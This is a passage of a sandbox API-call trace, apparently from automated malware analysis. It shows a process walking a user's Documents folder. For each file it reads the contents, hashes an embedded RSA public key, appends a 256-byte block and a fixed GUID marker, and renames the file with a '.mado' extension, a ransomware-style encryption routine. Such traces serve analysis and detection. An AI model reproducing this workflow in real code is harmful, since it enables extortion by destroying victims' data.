returned 0x32b69d8 [0206.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0206.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0206.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0206.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0206.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b78 [0206.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0206.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0206.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0206.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0206.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0206.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0206.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b30 [0206.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0206.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0206.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0206.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0206.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b48 [0206.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0206.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0206.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0206.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b18 [0206.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0206.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b90 [0206.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0206.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0206.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b60 [0206.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ba8 [0206.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0206.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0206.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0206.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b30 | out: hHeap=0x2c0000) returned 1 [0206.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b30 [0206.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0206.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b78 | out: hHeap=0x2c0000) returned 1 [0206.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72ec8 [0206.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ba8 | out: hHeap=0x2c0000) returned 1 [0206.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0206.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0206.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b72c98 [0206.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0206.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72fe0 [0206.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b30 | out: hHeap=0x2c0000) returned 1 [0206.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b7b950 [0206.298] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xe4c4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.298] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6efa0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6efa0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.298] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.298] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.298] CloseHandle (hObject=0x63c) returned 1 [0206.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6360 [0206.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8d0) returned 0x3b7b950 [0206.302] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\dDSiV9mIqla-\\dd5jA.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\ddsiv9miqla-\\dd5ja.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\dDSiV9mIqla-\\dd5jA.doc.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\ddsiv9miqla-\\dd5ja.doc.mado")) returned 1 [0206.303] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x380e4cd0, ftCreationTime.dwHighDateTime=0x1d5dbc1, ftLastAccessTime.dwLowDateTime=0x3c6b390, ftLastAccessTime.dwHighDateTime=0x1d5dcb6, ftLastWriteTime.dwLowDateTime=0x3c6b390, ftLastWriteTime.dwHighDateTime=0x1d5dcb6, nFileSizeHigh=0x0, nFileSizeLow=0x10dc2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="K1_aZO07rDa.ods", cAlternateFileName="K1_AZO~1.ODS")) returned 1 [0206.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x106) returned 0x3b72b80 [0206.303] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\dDSiV9mIqla-\\K1_aZO07rDa.ods") returned=".ods" [0206.303] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\dDSiV9mIqla-\\K1_aZO07rDa.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\ddsiv9miqla-\\k1_azo07rda.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.303] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=69058) returned 1 [0206.304] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.306] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x10d9c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.306] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.308] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x10dc2, lpOverlapped=0x0) returned 1 [0206.310] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.310] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.310] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.310] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321738) returned 1 [0206.311] CryptCreateHash (in: hProv=0x321738, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.311] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.311] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.311] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.311] GetLastError () returned 0x0 [0206.311] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.311] CryptReleaseContext (hProv=0x321738, dwFlags=0x0) returned 1 [0206.311] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.311] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.311] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.312] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0206.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.312] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x10dc2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.312] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6efa0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6efa0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.312] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.312] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.312] CloseHandle (hObject=0x63c) returned 1 [0206.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292de0 [0206.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8d0) returned 0x3b7b950 [0206.314] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\dDSiV9mIqla-\\K1_aZO07rDa.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\ddsiv9miqla-\\k1_azo07rda.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\dDSiV9mIqla-\\K1_aZO07rDa.ods.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\ddsiv9miqla-\\k1_azo07rda.ods.mado")) returned 1 [0206.316] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c618b70, ftCreationTime.dwHighDateTime=0x1d5dc16, ftLastAccessTime.dwLowDateTime=0xffba2960, ftLastAccessTime.dwHighDateTime=0x1d5e6e4, ftLastWriteTime.dwLowDateTime=0xffba2960, ftLastWriteTime.dwHighDateTime=0x1d5e6e4, nFileSizeHigh=0x0, nFileSizeLow=0x15358, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kufgrGRQl.ots", cAlternateFileName="KUFGRG~1.OTS")) returned 1 [0206.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x106) returned 0x3b72b80 [0206.316] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\dDSiV9mIqla-\\kufgrGRQl.ots") returned=".ots" [0206.316] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\dDSiV9mIqla-\\kufgrGRQl.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\ddsiv9miqla-\\kufgrgrql.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.316] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=86872) returned 1 [0206.316] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.318] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x15332, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.318] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.320] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x15358, lpOverlapped=0x0) returned 1 [0206.321] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.321] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.321] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.321] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321738) returned 1 [0206.322] CryptCreateHash (in: hProv=0x321738, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.322] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.322] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.322] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.322] GetLastError () returned 0x0 [0206.322] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.322] CryptReleaseContext (hProv=0x321738, dwFlags=0x0) returned 1 [0206.322] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.322] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.322] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.323] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0206.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.323] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x15358, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.323] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6efa0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6efa0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.323] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.323] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.323] CloseHandle (hObject=0x63c) returned 1 [0206.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292de0 [0206.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8d0) returned 0x3b7b950 [0206.325] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\dDSiV9mIqla-\\kufgrGRQl.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\ddsiv9miqla-\\kufgrgrql.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\dDSiV9mIqla-\\kufgrGRQl.ots.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\ddsiv9miqla-\\kufgrgrql.ots.mado")) returned 1 [0206.326] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbff157f0, ftCreationTime.dwHighDateTime=0x1d5d900, ftLastAccessTime.dwLowDateTime=0x3e43e0d0, ftLastAccessTime.dwHighDateTime=0x1d5e312, ftLastWriteTime.dwLowDateTime=0x3e43e0d0, ftLastWriteTime.dwHighDateTime=0x1d5e312, nFileSizeHigh=0x0, nFileSizeLow=0xaabf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ta4tu7_MhJ OhJavw.pps", cAlternateFileName="TA4TU7~1.PPS")) returned 1 [0206.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x106) returned 0x3b72b80 [0206.326] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\dDSiV9mIqla-\\Ta4tu7_MhJ 